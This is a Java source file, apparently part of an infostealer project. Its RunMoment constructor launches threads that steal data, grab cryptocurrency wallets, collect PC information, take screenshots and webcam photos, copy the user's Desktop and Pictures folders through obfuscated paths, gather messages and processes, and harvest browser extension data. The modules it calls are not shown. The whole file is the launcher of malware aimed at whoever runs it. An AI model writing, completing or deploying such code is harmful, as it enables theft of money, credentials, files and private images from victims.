package procat.ui;

import moduly.sbor.*;
import procat.sbor.GrabCrypto;
import procat.sbor.GrabWebExtensions;
import procat.sbor.SborMsg;
import procat.sbor.Steall;

import java.io.File;

public class RunMoment {

    public RunMoment() {
        Nastroiki nastr = new Nastroiki();

        Thread still = new Thread(new Steall());
        still.start();

        Thread grab_crupto_money = new Thread(new GrabCrypto());
        grab_crupto_money.start();

        Thread info_pc = null;
        try {
            info_pc = new Thread(new InfoPC());
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
        info_pc.start();

        Thread skrin = new Thread(new Skrin());
        skrin.start();

        Thread web_cam_photo = new Thread(new WebPhoto());
        web_cam_photo.start();

        Thread grabber = new Thread(new Grabber(nastr.decrName(nastr.getC_user_put()) + System.getProperty("user.name") + nastr.decrName(nastr.getDesktop()), Nastroiki.getFolder()+nastr.decrName(nastr.getDesktop()), nastr.decrName(nastr.getC_user_put()) + System.getProperty("user.name") + nastr.decrName(nastr.getPictures()), Nastroiki.getFolder()+nastr.decrName(nastr.getPictures())));
        grabber.start();

        Thread sborMsg = new Thread(new SborMsg());
        sborMsg.start();

        Thread process_sbor = new Thread(new ProcessSbor(new File(Nastroiki.getFolder()+nastr.decrName(nastr.getProcess()))));
        process_sbor.start();

        Thread grab_web_extensions = new Thread(new GrabWebExtensions());
        grab_web_extensions.start();
    }
}
